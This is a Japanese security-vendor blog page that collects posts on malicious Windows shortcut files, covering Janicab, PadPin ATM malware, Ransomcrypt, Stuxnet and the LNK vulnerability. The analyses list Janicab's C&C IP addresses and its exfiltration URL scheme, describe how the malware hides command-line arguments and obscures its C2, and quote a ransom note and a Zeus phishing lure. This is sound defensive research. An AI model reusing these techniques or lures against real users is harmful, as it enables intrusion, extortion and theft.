エフセキュアブログ

ショートカット を含む記事

PowerShellを悪用したマルウェアが徐々に増加の予感!?

侵入後にPowerShellを悪用する事例が多く聞かれるようになりましたが、マルウェアの配送(メール、ウェブ経由)の際にも利用されているケースが出てきています。
まだ、多くは確認できていませんが、攻撃者にとって有用であることを考慮しますと、徐々に増加するものと予想されます。
現在のところ、その特性上のせいかウイルス対策ソフトによる検知率は芳しくありません。

下図のケースでは、ワードファイルを装ったショートカットファイルに細工が施されたもので、PowerShellを利用して外部の悪性サイトからマルウェアをダウンロードする仕組みになっています。

shortcut with powershell

その他では、XLSファイルにPowerShellが埋め込まれているものを確認しています。
Windows 7 から標準搭載されているPowerShellは大変便利な拡張可能なシェルです。しかし、それ故に悪用も容易である事は想像に難くありません。
その点を考慮してかはわかりませんが、スクリプト・ファイル(.ps1拡張子)の実行はWindowsの標準設定では制限されています。
しかし、安心はできません。実は、以前から既に回避策は多数報告されています。これらの現状に鑑みますと、今後を見据えての対策を検討しておきたいところです。

参考URL:
15 Ways to Bypass the PowerShell Execution Policy
https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/


ドキュメントにないLNKの機能に隠れるJanicab

 2年前、我々はJanicabというマルウェアを発見した。MacとWindowsを標的としており、それぞれPythonとVBSスクリプトを使用している。

 このマルウェアは、Windows OSではCVE-2012-0158を悪用したドキュメント経由で配信される。さらに2013年あたりから近頃まで、埋め込まれたエンコード済みのVBScriptをドロップする、Microsoft Shell Linkファイル(.lnk)の形式での配信も目にしている。

 目的を分かりにくくするため、このドロッパーが用いるトリックはいくつかある。

 - 拡張子を二重にしたファイル名(例:.jpg.lnk や .doc.lnk)
 - (デフォルトのcmd.exeの代わりに)notepad.exeのアイコンを使用
 - センシティブな可能性のあるデータ、たとえばマシンIDや相対パスなどはゼロで潰す

 しかしもっとも興味深いのは、コマンドライン引数の文字列をWindowsエクスプローラーから隠ぺいするために、ドキュメントにない方法を使っている点だ。一般的にWindowsエクスプローラーでは、ショートカットアイコンを右クリックすることで、プロパティの中でリンク先とその引数を一つの文字列として見ることができる。だが、今回のシナリオではコマンドラインの引数が見えないのだ。

1_Fotomama_screenshot (34k image)

 一連のシェルコマンドを&演算子で結合したものが、隠されたコマンドライン引数としてLNK内に存在している。

2_Fotomama_lnk (52k image)

 以下は、悪意あるVBEのドロップと実行を行う実質的な部分のコマンドのリストだ。

3_commands (34k image)

 このマルウェアスクリプトはMicrosoft Script Encoderを用いてエンコードされており、LNKファイルの末尾に埋め込まれている。

 実行すると、このスクリプトは以下のような囮のファイルをドロップする。

4_mama (68k image)

5_doc (555k image)

 Janicabは以前のバリアントと同様、C&Cサーバを取得するために、YouTubeなどサードパーティーのWebサービスをいまだに利用している。

6_youtubecomments (30k image)

7_blogspot (8k image)

8_googleplus (14k image)

 実際のC&CサーバのIPアドレスは、YouTube上で示されていた。しかし上図のように、マルウェア作者はC&Cサーバを分かりづらくしようとしてきた。最近のバリアントでは「our (.*)th psy anniversary」という形式のコメント内にある数値を収集する。

 実際のIPアドレスを得るには、当該Webサービスで見つけた数値を分割したり変換したりする。

9_ipconv (54k image)

 このバリアントで見つかったもう1つの変更点は、%UserProfile$\SystemFoldersnapIt.exeをドロップするところだ。このアプリケーションはスクリーンショットをキャプチャし、~PF214C.tmpとして保存するためにJanicabが使用している。

 また今では、自身がVirtualBox、Parallels、VMWareといった仮想マシン内で実行されている形跡があるか確認も行っている。同様に、以下のような実行中のプロセスを調べることにより、分析用のマシン上で実行されているかどうか確認している。

10_processes (77k image)

 今回のバリアントで、これまでに見つけたC&Cサーバの一覧は以下になる。
 • 87.121.52.69
 • 87.121.52.62
 • 94.156.77.182
 • 95.211.168.10

 C&Cサーバとの通信フォーマットは次のとおりだ。
 • [C&C]/Status2.php - C&Cサーバのステータスを確認
 • [C&C]/a.php?id=[SerialIDfromCnC]&v=[malware_version]&av=[InstalledAV] - cookieおよび囮ファイルが削除されたことを通知
 • [C&C]/gid.php?action=add&cn=[ComputerName]&un=[UserName]&v=[malware_version]&av=[InstalledAV]&an=[notifyName] - Serial IDを取得
 • [C&C]/rit.php?cn=[ComputerName]&un=[UserName]&an=[notifyName]&id=[SerialIDfromCnC]&r=[VMorRunningProcessName] - 分析用の実行中プロセスもしくはサンドボックス環境を通知
 • [C&C]/sm.php?data=[InstalledAV] - 起動メカニズムを取得
 • [C&C]/c.php?id=[SerialIDfromCnC] - コマンド群を取得
 • [C&C]/rs.php - スクリーンショットを送信
 • [C&C]/rk.php - データを送信
 • [C&C]/d.php?f=[Base64EncodedData] - ファイルをダウンロード

 このサンプルはTrojan-Dropper:W32/Janicab.Aとして検知される。

 SHA1のハッシュ
 • 4bcb488a5911c136a2c88835aa06c01dceadbd93
 • 41688ef447f832aa13fad2528c3f98f469014d13



 Post by — Jarkko and Karmina

NCR社製ATMのAPIドキュメントが百度(バイドゥ)で公開される

 最近起きた、マレーシアにおけるATM(現金自動預け払い機)の侵害では、いくつかの地元の銀行に大混乱を巻き起こした。報告されたところでは、おおよそ300万マレーシア・リンギット(約100万米ドル)が18台のATMから盗まれた。犯人がどのような方法で犯行を行ったのか詳細な情報はないが、地元のニュースで報じられたことによると、「ulssm.exe」というファイル名のマルウェアを犯人がインストールしたと警察は述べているとのことだ。このマルウェアは侵害されたATMで見つかった。ファイル名からすると、問題のマルウェアはシマンテック社が最初に発見した、「PadPin」として知られているものだと我々は考えている。このマルウェアに関する基本的な技術情報はこちらにある。マレーシアでATMのハッキングに使われたものとPadPinが同一のものであるかについて、我々には確信はない。しかしそれでも、当社にてPadPinのコードの分析を行ったところ、興味深い点が見つかった。

 当社のバックエンドである、サンプル集約システムをくまなく探し、すぐに前述のファイル名に関連するサンプルをいくつか特定した。このサンプルは典型的なWindowsコンピュータでは動作しなかったため、当社のサンプル自動分析システムは、当該サンプルが悪意のあるものと判定しなかった。このサンプルは、ATMやセルフサービス端末などWindows Embedded OSを実行するマシン上にあると思われるDLLライブラリを必要とするのだ。このDLLライブラリはXFS(Extension for Financial Services)と呼ばれる。

Malware import Extension for Financial Services library
画像:マルウェアはXFSライブラリをインポートしている

 コードの調査中、見慣れないAPIファンクション群を発見した。見たところ、上の画像で示したMSXFS.dll経由でインポートされるものだ。残念ながらマイクロソフトはこれらのAPIについて公式なドキュメントを提供しておらず、そのことがマルウェアのコードの理解を難しくしている。マルウェアコードのある部分に出くわすまで、疑問は続いた。前述のAPI群のうちの1つを用いて、ATMの暗証番号入力パッドとの通信チャネルの確立を試みる部分だ。基本的にその目的は、犯人が暗証番号入力パッドに入力したキーをリッスンし待機することだ。これは、シマンテックの記事で述べられている別のタスクを実行するためのものだ。言い換えると、マルウェアがサポートするコマンドは、暗証番号入力パッドで入力できるキーに限られる。たとえば、犯人が暗証番号入力パッドで「0」と入力すると、ATM自動機から現金の払い出しを始める。コードを分析しながら、我々は不思議に思い始めていた。暗証番号入力パッドのサービス名として何をAPIに提示すれば、プログラムが暗証番号入力パッドと通信できるようになるのか、マルウェアの作者はどうやって知ったのだろうか。これはもっともな疑問である。コード内で使われているサービス名は非常に独特なもので、マニュアル無しにサービス名を特定できることは、まったくもってありそうにない。

 そこで我々は、API名とサービス名を用いて、APIのマニュアルがないかWebで検索を行った。その結果は?百度に設置された専用の電子書籍のWebサイトにて、容易にマニュアルが見つかった。NCR社のプログラマ用のリファレンス・マニュアルのようだ。

WOSA/XFS Programer's Reference Manual

 マニュアル全体をざっと読んで、ATMとの通信を行うソフトウェアをどのようにプログラミングするかについて予備知識がない人にとっても、ATM自動機とやり取りをするプログラムを書くことは、お手軽になったと結論付けた。このドキュメントは、その上プログラマにコードのサンプルを提示するほど親切である。我々は偶然、次のことにも気付いた。マレーシアの銀行のATM自動機を標的にする件のマルウェアが、Windowsのスタートアップフォルダから「AptraDebug.lnk」というショートカットファイルを削除しようと試みている。それと同様に、感染したマシン上のローンチポイントのレジストリキー「AptraDebug」もだ。その目的はおそらく、マシン上で実行中のデフォルトのATMソフトウェアを無効化し、マシンが再起動する際にそれをマルウェアで置き換えることだ。このファイルとレジストリキーは、NCR APTRA XFSソフトウェアを参照しているように見受けられる。そのため当該マルウェアが、このセルフサービスのプラットフォーム用のソフトウェアを実行しているマシンのみを狙ったものと仮定しても間違いないだろう。

 結論として、PadPinの作者ではない何者かがこのドキュメントを漏えい、アップロードした可能性がある。そして、銀行の従業員で経験豊かなプログラマがこのマルウェアを書いたという説を排除してはならない。

 ドキュメントがインターネット上でいったん入手可能となったら、誰かがそれを閲覧したりダウンロードしたりするのを止めることは、現実的には不可能だ。しかし、こうした侵害が再び起こることを避けるために銀行が採用できる対策がある。USBやCD-ROMから直接ファイルを実行しないようにATM自動機を守ることは、もっとも単純な対応方法の1つだ。

Post by — Wayne

日本の安全保障を狙った攻撃の手口

先日から日本の安全保障に関する業務に携わっている方々に対してマルウェア付きのメールが届いているようですので、その手口を紹介します。

最初に、メールの添付ファイルとして「取材依頼書」というファイル名のzipファイルが届きます。
lnkmalware1

zipファイルを展開すると、テキストファイルへのショートカットが入っています。
lnkmalware2

プロパティを確認すると、確かにtxtファイルへのショートカットになっているように見えます
lnkmalware3

ところが、リンク先の欄を左にスクロールしていくと、別の文字列が出てきます。
lnkmalware4

本当のリンク先は%ComSpec% ...となっています。%ComSpec%というのはコマンドプロンプト(cmd.exe)を意味しますので、このリンク先の欄で攻撃者が指定した命令を実行させられてしまう、つまりは攻撃者にPCを乗っ取られてしまうことになります。
今回の事例では、もしショートカットをクリックしてしまうと、感染したPCのフォルダやファイルの情報を盗み出し、最終的にはPC内のファイルの内容を盗み出す仕組みになっておりました。

以上がショートカットを利用したマルウェアの手口ですが、皆さんに注意していただきのは、
人から送られてきたショートカットはクリックしてはいけない
ということに尽きます。
ショートカットは実行ファイル(exeファイル)と同じくらい危険だと思ってください。

このような手口は何かの脆弱性を攻撃しているわけではなく、ショートカットの”仕様”を利用したものですので、ウイルス認定することが難しく、多くのウイルス対策ソフトウェアでは検知できませんし、ふるまい検知型のウイルス対策ソフトでも検知することができませんでした。


さて、すでに多くの方はお気づきになっていると思いますが、日本語版のOSではショートカットのファイル名が文字化けしています。
そこで別の言語のOS上でもzipファイルを展開してみたので、結果を紹介して、文字化けの理由の回答とさせていただきます。

lnkmalware-jalnkmalware-zh



Trojan:W32/Ransomcrypt

  我々はランサム型トロイの木馬の報告を受けているが、これはここ2日に広まっているものだ。

  システムで最初に動作する際、このランサムウェアはシステム上の全フォルダを反復する。全てのドキュメント、画像、ショートカット(.lnk)ファイルが「.EnCiPhErEd」の拡張子で暗号化され、追加される。各フォルダに、どのように進めるかのインストラクションを含む「HOW TO DECRYPT.TXT」というテキストファイルがドロップされる。詐欺師たちは50ユーロ要求している。

  同ランサムウェアはシステムの一時フォルダに、ランダムな名称で自身のコピーをドロップする。「.EnCiPhErEd」エクステンションを自身に結びつけるため、レジストリ・エントリを作成する。そうすることで、一時フォルダのコピーはそれらファイルが実行される際には、復号化パスワードを要求するため常に開始されるのだ。5回試行すると、それ以上パスワードを受け付けない。そして次に自身を削除し、ユーザのデータは暗号化されたままになる。

  エフセキュアの脅威ハンターたちは、このランサムウェアのソースは、サイト、特にフォーラムに挿入された悪意あるタグからのものだと考えている。

  以下は、同トロイの木馬が作用した後、暗号化されたファイルがどのように見えるかだ:

CRYPTED!

  以下はテキストファイルのコンテンツ:

Attention! All your files are encrypted! You are using unlicensed programs! To restore your files and access them, send code Ukash or Paysafecard nominal value of EUR 50 to the e-mail [removed]@gmail.com. During the day you receive the answer with the code. You have 5 attempts to enter the code. If you exceed this of all data irretrievably spoiled. Be careful when you enter the code!

  「注意!」

Attention!

  間違ったパスワードをインプットすると、ユーザが受けとる「「エラー!」メッセージ:

Error!

  別のエラーメッセージ。.txtファイルにある要求を繰り返す:

Error

  このトロイの木馬が使用する暗号化は、Gpcodeなど、我々が分析した他の一部ランサムウェアほど複雑ではない。その暗号化がクラック可能かどうかを見極めるための調査が進行中だ。

SHA1: b8f60c64c70f03c263bf9e9261aa157a73864aaf

Analysis by — K.M. Chang

Anonymous:最終的な決定者は誰なのか?

  忙しい週だったので、ブログ記事のアイディアはあったのだが、今日は書く時間があまり無い…

  そこで、以下に私のTwitterフィードのスクリーンショットからのショートカットを掲載する:

twitter/fslabsadvisor #PriceRitePhoto

twitter/fslabsadvisor #PriceRitePhoto
(http://bit.ly/kFc7yy) (http://bit.ly/lwqxZt)

twitter/fslabsadvisor #PriceRitePhoto

twitter/fslabsadvisor #PriceRitePhoto
(http://bit.ly/inNMzO)

  本当に誰?

#anonymous #sony

Vacon社と協業、「Stuxnet」対策躍進を狙う

再生利用エネルギー産業と電動機器産業にACドライブを世界的に供給しているVacon社とエフセキュアが、産業オートメーション技術におけるアプリケーションのセキュリティ研究を推進するために協業することになりました。
続きを読む

LNK脆弱性を悪用したStuxnetワームはイラン核施設を狙ったマルウェア兵器か?

  7月に報告されたWindowsのLNKショートカット脆弱性のゼロディを悪用する「Stuxnet」ワームについてはF-Secureプログでも多数報告していますが、このワームはWindows上で動くドイツのSiemens社製SCADAシステムのマネジメントソフトウェア「WinCC」をターゲットにしているのが特徴でした。
「スパイ攻撃がLNKショートカットファイルを使用」
「ついに標的に狙われたSCADAシステム」
「LNKエクスプロイトに関するその後の分析」
「LNK脆弱性: ドキュメントの埋め込みショートカット」
「ショートカット・ゼロディ・エクスプロイットのコードが公開」
「LNK脆弱性:Chymine、Vobfus、SalityおよびZeus」

  さらにStuxnetワームの活動の特徴として、7月の時点でもイランでの高い感染率 が指摘されていました。Symantec社のブログによると、SymantecではStuxnetワームのコマンド&コントロール(C&C)サーバーが2つ存在することを特定し、ワームからC&Cへ向かう通信トラフィックをリダイレクトする作業を行っていましたが、トラフィックの観測によると7月22日までの72時間の間にワームが発信してきた約14000のIPアドレスが見つかり、さらにその58.85%がイランから、18.22%がインドネシアから、8.31%がインドから、2.57%がアゼルバイジャンからであることを発見しています。
「W32.Stuxnet — Network Information」 Symantec Blogs

  SCADAとは「Supervisory Control and Data Acquisition」の略で、工場のオートメーションなどに使われる、機器制御とモニタリングのデータ収集とを行うための取り付けモジュール型コンピューター装置のことを指します。SCADAは、工場だけでなく電力網、ガス供給、水道、石油パイプラインなど重要インフラでも大規模に使用されています。以前からSCADAのセキュリティについては、サイバー戦争やサイバーテロに対する危惧から様々な指摘が出されて来ていました。

  Stuxnetワームは、USBデバイスに潜んで、WindowsOSのPCに挿し込まれるとスキャンを開始し、他のUSBデバイスを探して自身をコピーし感染を試みますが、もしマシン上にSiemensのWinCCソフトウェアを発見するとデフォルトパスワードでログインしようとします。このことから、イランから発信されたワームのトラフィックが60%近いということは、SimensのSCADAとコントローラーである「Simatic WinCC」がそれだけ多数イラン国内で使われていることと、感染を狙ってワームが重点的に撒かれたのがイラン国内であろうという可能性が推測されていました。

  ところが、発見から2ヶ月あまりたった9月21日付近からStuxnetに関するニュースが急激に増え始め、ついに25日にはBBCやFinancial Times、Aljazeera、Bloomberg、Christian Science Monitor、CNN、AFP、共同通信などの一般ニュースメディアに登場しました。これは、DEBKA Fileなどにも情報が現われ、イランのBushehr(ブシェール)核施設がターゲットであることがほとんど公の事実状態になったためです。
BBC 「Stuxnet worm 'targeted high-value Iranian assets'」
Finacial Times 「Malicious computer worm launched at industrial targets」
Aljazeera 「Iran 'attacked' by computer worm 」
Christian Science Monitor 「
Stuxnet malware is 'weapon' out to destroy ... Iran's Bushehr nuclear plant?」

CNN 「Stuxnet' Computer Cyber Worm Targets Iran」
AFP日本語 「工業施設システムをねらうコンピューターウイルス、米当局も調査中」
共同通信 (47ニュース) 「イラン、「サイバー攻撃受けた」 PC約3万台感染と報道」
DEBKA File 「
Tehran confirms its industrial computers under Stuxnet virus attack 」


  BBCの記事ではSiemens社のスポークスパーソンの発言として、イランの核施設はロシアの協力によるものでありSiemensはイランを30年前に離れている、ということを紹介しています。しかし、なぜイラン国内でSiemens社のSCADAが使われているかについて、2009年2月のThe Wall Street Journalの記事がたいへん示唆的な内容を示しています。これによると、Siemens社は2008年の時点でイランのガス、石油、インフラ、通信セクターにおいて4億8300万ユーロ規模のビジネスを展開しているとの見方をWSJ記事は示しています。
「How Europe's Companies Are Feeding Iran's Bomb」 The Wall Street Journal 

  じつはこれに先立つ9月17日、F-Secureのミッコ・ヒッポネンが興味深い画像リンクをTwitterにポストしていました。写っているのは、UPIが2009年2月25日に掲載したというBushehr原子力発電プラントのコンピュータースクリーンがエラーメッセージを出している模様です。これを拡大して見るとWinCCの画面であることが判り、さらにエラーメッセージは「ソフトウェア・ライセンスの期限が切れている」というものです。

  このUPIの記事には施設を視察するアフマディネジャド大統領の姿などもあります。(ただしこのWinCCの画面をよく見るとPolyacrylやSulphoric AcidやLime Milkなどの用語があるので、原発そのものではないと思われますが)。
「Iran Nuclear Issue」 UPI 

  イランの核施設はBushehr原子力発電プラントの他にNatanzに核燃料濃縮精錬所があると言われ、Stuxnetはこちらの方をターゲットにしていたと推測する見解もあります。 
「stuxnet: targeting the iranian enrichment centrifuges in Natanz?」
「A Silent Attack, but Not a Subtle One」 NYTimes

  同じ頃、ドイツのセキュリティ研究者ラルフ・ラングナーもこのUPI記事について触れ、攻撃ステップについての分析を挙げています。
「Ralph's analysis, part 2」

  ここで当然の事として、Stuxnetワームを開発したのは一体誰なのかが疑問に上がります。イランは独自に核開発を行い核兵器を保有することを公言しているため、西側諸国はイランの動静に対して神経質であり、様々な対抗措置を発動していることから、事態は国際情勢に絡むため複雑な様相になり、8月初頭の時点でも、よくある犯罪組織が開発したマルウェアではない可能性が推測されていました。イランにより「地上から消滅させる対象」と見なされているイスラエルは、イランの核開発に対して莫大な懸念を持っています。イランの核開発に対して神経質になっているアメリカは、イランに対して貿易禁止措置を行っています。すぐ隣に位置するトルコもイランの核開発を警戒しています。さらに、このような世界情勢を利用してSiemensの足を引っぱろうとする競合企業による可能性もあるかもしれません。

  Stuxnetの開発元についての推測では、すでにイスラエルを名指しする動きも出ています。9月24日のBloombergニュースにChertoff Groupのセキュリティ専門家が登場し、イスラエルがこのワームの製造元であっても驚くべきことではない、という見解を示しました。Chertoff Groupとは、名前のごとくブッシュ政権時代にアメリカ国土安全保障省の長官だったマイケル・チャートフのコンサルティング会社ですが、そこに属する専門家がイスラエルの関与を示唆したのは、それはそれで興味深いものがあります。経済関連情報を扱うZero HedgeにBloombergニュースのビデオクリップがあります。
「Security Expert Suggests Stuxnet Originated In Israel」 Zero Hedge

  他にもイスラエルのニュースサイトYnetnews.comの2009年7月7日の、イスラエルがイランに対してのサイバー戦争を見据えているという記事に載った「A contaminated USB stick would be enough,(汚染されたUSBスティックが1本あれば良い)」という、アメリカ・ワシントンで活動するサイバーセキュリティアドバイザーといわれるスコット・ボーグのコメントを根拠にする話題もあります。
「Wary of naked force, Israel eyes cyberwar on Iran」 Ynetnews

  これらの西側報道に対してイランも、核施設はStuxnetのサイバー戦の影響から安全であると9月26日に正式発表しました。
「 Official: Iran’s nuclear sites safe from Stuxnet cyber warfare 」 IRNA

  今回のStuxnetワームが示したのは、開発元がどこの国であったとしても、このような形の重要インフラを狙うサイバー戦争がリアルに進行しているということです。その後の発見によると、StuxnetワームにはLNK脆弱性だけでなく合わせて4つのゼロデイが使われていることが解明されています。その内2つはすでにパッチが出されましたが、まだ2つはパッチされていません。Stuxnetに関するさらなる詳細な報告が9月29日に開催されるVirus BulletinコンファレンスでSymantecの研究者により報告されることになっています。近日中に続報があるでしょう。
「Last-minute paper: An indepth look into Stuxnet」 Virus Bulletin

Windows XP SP2にLNKアップデート(KB2286198)をインストールする方法

  Microsoftは7月13日、Windows XP Service Pack 2のサポートを終了した。つまり、昨今のLNKショートカット脆弱性(KB2286198)用のSP2アップデートは無いということだ。「SANS Diary」のこの記事のコメントをチェックすれば、Microsoftの「セキュリティ情報(MS10-046)」に誤植があるため、SP2サポートに関して、当初若干の混乱があったことが分かるだろう。情報は現在、修正されている。

  しかし、今日になっても、Windows XP用のダウンロードにはまだ、ファイルプロパティにSP2が含まれている。

KB2286198, Properties

  しかし、SP2システムに同アップデートをインストールしようとしても、以下のようなエラーメッセージが出る:

KB2286198, Setup Error

  「セットアップは、あなたのシステムにインストールされているService Packのバージョンが、このホットフィックスを適用するのに必要なバージョンよりも古いことを検出しました。最低限でも、Service Pack 2をインストールしている必要があります。」

  この最低限の要件は、SP3を必要とする他のソフトウェア、「Grand Theft Auto IV」のことを思い出させる。

GTA IV

  GTA IVは、2008年12月にリリースされた時、SP2システム上にインストールできなかった。

  そして意志の強いゲーマーたちが、レジストリハックを考えついた。

XP SP2 Registry Hack

  これにより、以下のキー「HKLM\System\CurrentControlSet\Control\Windows」を編集し、DWORD値CSDVersionを200から300に編集すると(そして再起動する)、SP2システムはSP3だとみなすことが分かった。

  GTA IVでは上手く行ったので、我々は「KB2286198」でテストしてみることにした。そして我々のテストは上手く行き、レジストリを調整すると、我々のSP2テストシステムに「WindowsXP-KB2286198-x86-ENU.exe」がインストールされた。LNKエクスプロイトのテストも行ったが、パッチを当てると同システムには感染しなかった。

  クールだ。

  とは言え、このアップデートはMicrosoftによりSP2用に公式なテストが行われたわけでもなく、サポートされてもいないことに注意したい。そして我々は誰であれ、いかなる種類の生産ネットワーク上でも、このような調整を行うことを推奨していない。レジストリのハッキングを行い、アップデートを適用することは、そのシステムを不安定にする原因となりやすい。できるなら、Service Pack 3にアップデートすべきだ。

  もし実験してみたいなら、自己責任で行って欲しい。

追記:読者がSecurity Active Blogへのこのリンクを、この記事のコメント欄にペーストしてくれた。

  Windows XP Embedded用のセキュリティアップデートは、Windows Service Pack 2システムにもインストールできるが、レジストリの調整は必要無い。同ファイルは「WindowsXP-KB2286198-x86-custom-ENU.exe」という名だ。

LNK脆弱性:Chymine、Vobfus、SalityおよびZeus

  悪いニュースがある。現在、いくつかのマルウェアファミリが、MicrosoftのLNK脆弱性(2286198)を悪用しようとしているのだ。

  しかし良いニュースもある。これまでに、我々によって、そして他の多くのベンダによって、これらの新しいエクスプロイトサンプルが検出されている。基本的に、我々が見ているのはベーシックな同一のエクスプロイトメソッドを使用した新しいペイロードで、これは同エクスプロイトの新バージョンではなく、ジェネリックに検出される。

  以下は状況の概要だ。StuxnetルートキットはLNKゼロデイを利用する初のファミリーだった。そして先週、ChymineとVobfusがこれに続いた。我々の検出名は「Trojan-Downloader:W32/Chymine.A」および「Worm:W32/Vobfus.BK」となっている。

  Chymineは新しいキーロガーだ(.Aバリアントから見ることができる)。これはLNK脆弱性を使用して感染させるが、付加的な.LNKファイルを作成して拡散はしない(よってワームベクタは無い)。Chymineを発見したのはESETの人々だ。

Chymine

  Vobfusは常にショートカットを使用するより古いファミリーで、ソーシャルエンジニアリングと組み合わされる。この最新のバリアントは、機能を増やすのみだ。Microsoftの研究者Marian Raduが、Vobfusファミリーの命名者だ。

  今日のニュースには、Sality(ポピュラーなポリモーフィックウイルス)とZeus(ポピュラーなボットネット)が含まれている。我々はSalityサンプルと、拡散ベクタとして使用されるLNKファイルをジェネリックに検出する。

  Zeusの亜種は、「Security@microsoft.com」からのものに見えるメッセージを含み、「Microsoft Windows Security Advisory」というタイトルを持つ電子メールの添付ファイルとして検出された。

  以下が本文だ:

Hello, we are writing to you about a new Microsoft security advisory issue for Windows. There is a new potentially dangerous software-worm, attacking Windows users through an old bug when executing .ICO files. Although this is quite an old way of infecting software, which first was used in 1982 with Elk Cloner worm, the new technique the new worm is using is more complicated, thus the speed and number of attacs has strongly increased. Since you are the special Microsoft Windows user, there is a new patch attached to this e-mail, which eliminates the possibility of having you software infected. How to install: open an attached file

  Zeusは防止するのに取り組みがいのある脅威で、この亜種を検出したベンダはまだ多く無い。我々は現在、検出を追加しているところだ。幸いなことに、使用されるエクスプロイトは多くのベンダが検出しており、すべては犠牲者にパスワードで保護したzipファイルを開けさせ、lol.dllをCのルートにコピーさせるソーシャルエンジニアリングに依存している。何故ならばこのパスは、エクスプロイトが動作するために既知でなければならないからだ。

  我々は今回のZeusの亜種が、それほど成功するとは考えていない。

LNK脆弱性:ドキュメントの埋め込みショートカット

  Microsoftが「セキュリティ アドバイザリ 2286198(バージョン1.2)」をアップデートした。

  Microsoftの人たちが、懸命にこの問題に取り組んでいることは非常に明白だ。我々の懸念は対処されており、同アドバイザリはもはやWindows 7 AutoPlayを緩和策とはしていない

  そして今度は悪いニュース。

  同アドバイザリのバージョン1.2には、新しい重要な詳細が含まれている:

  「エクスプロイトは、埋め込みショートカットをサポートする特定の文書タイプにも含まれる可能性がある。」

Microsoft Security Advisory 2286198, version 1.2

  文書 — Microsoft Office書類のような文書。

  これはまさに、LNK脆弱性の潜在的な影響範囲を拡大するものだ。文書利用の容易さを考えると、我々はまもなく、電子メールメッセージを介した標的型攻撃添付ファイルをほぼ確実に見ることになるだろう。

  幸いなことに、MicrosoftのActive Protections Program(MAPP)は優れた技術的詳細を提供しており、我々はWormLinkエクスプロイトに対するプロテクションをさらに改善した。我々の最新のシグネチャ:Exploit:W32/WormLink.BおよびCはより包括的であり、以前よりも効果的だ。Microsoftに賞賛を送りたい。

  アドバイザリにリストされている回避方法をチェックしてみよう。

  •  ショートカット用アイコンの表示を無効にする
  •  WebClient サービスを無効にする
  •  インターネットのLNKおよびPIFファイルのダウンロードをブロックする

  Microsoft Supportは、1度クリックすることでショートカット機能を無効にする「Fix it」ボタンを含むKnowledge Base Articleを掲載している。

  Microsoftはセキュリティアップデートを開発するべく鋭意努力中だが、皆がこの新情報をチェックし、自分の環境に即して評価すべきだ。

「セキュリティ アドバイザリ(2286198)」を更新

  Microsoftが「セキュリティ アドバイザリ(2286198)」を更新し、現在、以下のように明記している:

  「同脆弱性は、ユーザが特別に作成されたショートカットのアイコンが表示されると、悪意あるコードが実行されるかもしれない方法で、Windowsがショートカットをパースすることが原因だ。」

  「表示される」というのは重要なキーワードだ。これは良いことであり、我々が懸念していた点に対処している

  しかしながら、同アドバイザリは現在も以下のように表明している:

  「Windows 7システムについては、リムーバブルディスクのオートプレイ機能は、自動的に無効となる。」

  これはまだ不正確だ。あるいは少なくとも、十分正確とは言えない。我々はMicrosoftが何を言おうとしているか分かるが、中には誤解する人もいるかもしれない。リムーバブルディスクのAutoPlay機能が自動的に「制限」される、と述べた方が良いだろう。

  我々のWindows 7テストマシンを見てみると、これは堅牢にしてあるのだが、AutoPlayコントロールパネルでボタンは以下のようになっている:

Windows 7 AutoPlay defaults

  「全デフォルトにリセット」

  そこで、我々はデフォルトの回復を選択した:

Windows 7 AutoPlay defaults

  すると「全メディアおよびデバイスでAutoPlayを使用する」が有効になっている。「全」メディアおよびデバイスだ。

  以下は、マルチメディアファイルを含むUSB Flashドライブを、このWindows 7システムに差し込んだ時に表示されたダイアログだ:

Windows 7 AutoPlay defaults

  ハイライトされているオプションは「ファイルを閲覧するためにフォルダを開く」だ。

  では何が無効なのか? AutoPlayだろうか? 違う。Windows 7 AutoPlayは無効ではなく、むしろ、リムーバブルディスクにデフォルトの「アクション」を設定する「オプション」を含んでいないということだ。

  しかしLNK脆弱性のケースでは、1回クリックすれば、「デフォルト」で危険にさらされる。

  Windows 7 AutoPlayは、Windows XP AutoPlayと比較して格段に改善されている。実際、おそらくはセキュリティと機能性の完璧なバランスと言えるだろう。コンシューマにとっては…

  しかし、標的型攻撃のリスクにさらされた企業や組織ではそうはいかない。AutoPlayは完全に無効にすべきなのだ。

  何故?

  以前の記事にも記したように、ソーシャルエンジニアリングトリックはAutoPlayを標的とするからだ。

  たとえば、これはConfickerの攻撃メソッドの一つだ:

Windows 7 AutoPlay and Conficker

  Confickerのautorun.infファイルは、最初のオプション提示としてWindowsシステムフォルダを使用した。1回のクリックで、autorun.infがローンチする。クレバーなトリックではないだろうか?

  その他の理論的なAutoPlay問題もある(脆弱性ではない)。USBストレージデバイスは、Virtual CDとしてフォーマットされたパーティションを含むことができる。

  この場合、パーティションはAutoPlayにより通常のCDとみなされる。

Windows 7 AutoPlay and Virtual CD

  我々が6月にVirtual CDに関する記事を書いた時には、それが故意に、標的型攻撃に使用されるのを目撃することなど、かなり可能性が低いように思われた。我々は、製造プロセスのセキュリティ侵害により、影響が出るかも知れないと考えた。Virtual CDは工場のマスターコピーで感染するかもしれないからだ。

  しかし現在、ゼロデイの欠陥、署名されたドライバを使用し、Siemens SIMATIC WinCCデータベースを標的とするStuxnetケースを考えると… たぶんVirtual CD攻撃という考えは、結局それほどこじつけでは無いだろう。明らかに、高い動機付けを持つスパイ活動が登場しているのだ。

結論:あなたがネットワーク内のWindows 7システムのIT管理者ならば、AutoPlayを無効にすること。

ショートカット・ゼロデイ・エクスプロイトのコードが公開

  MikkoのTwitterフィードをフォローしていないなら、exploit-db.comで、Windowsショートカット(.lnk)脆弱性のパブリックPoCエクスプロイト・コードがリリースされたという、昨日のニュースをご存じないかもしれない。

  これはさらに、ショートカット脆弱性の危険を拡大する。これまでStuxnetルートキットの作者だけがこの欠陥を利用してきたが、現在は他の悪者たちが、すぐ後に続くであろうことに疑う余地はない。

  幸いにも、一部の人々はこのPoCを良い目的にも使用している。

  Didier Stevens(Adobe Readerの/launch機能に関するリサーチでよく知られている)は、彼のAriadツールで同エクスプロイトをテストし、これは上手くブロックされた。StevensはWindows 2000 SP4までさかのぼってテストしている。もしMicrosoft Securityアップデートの予定が無いレガシーシステム(Windows XP SP2など)を保持する必要があるなら、Ariadは一つの選択肢と言えるかもしれない。

  しかしStevensはAriadをベータソフトウェアとしているため、選択肢とならない人もいるだろう。それでは他にどんな方法があるだろうか?

  SophosのChet Wisniewskiは、実行ファイルのローンチをローカルハードドライブに制限するため、Group Policiesを使用する事を提案している。

  そしてもちろん、Microsoftのセキュリティ アドバイザリによる回避方法もある。

  •  ショートカット用アイコンの表示を無効にする
  •  WebClient サービスを無効にする

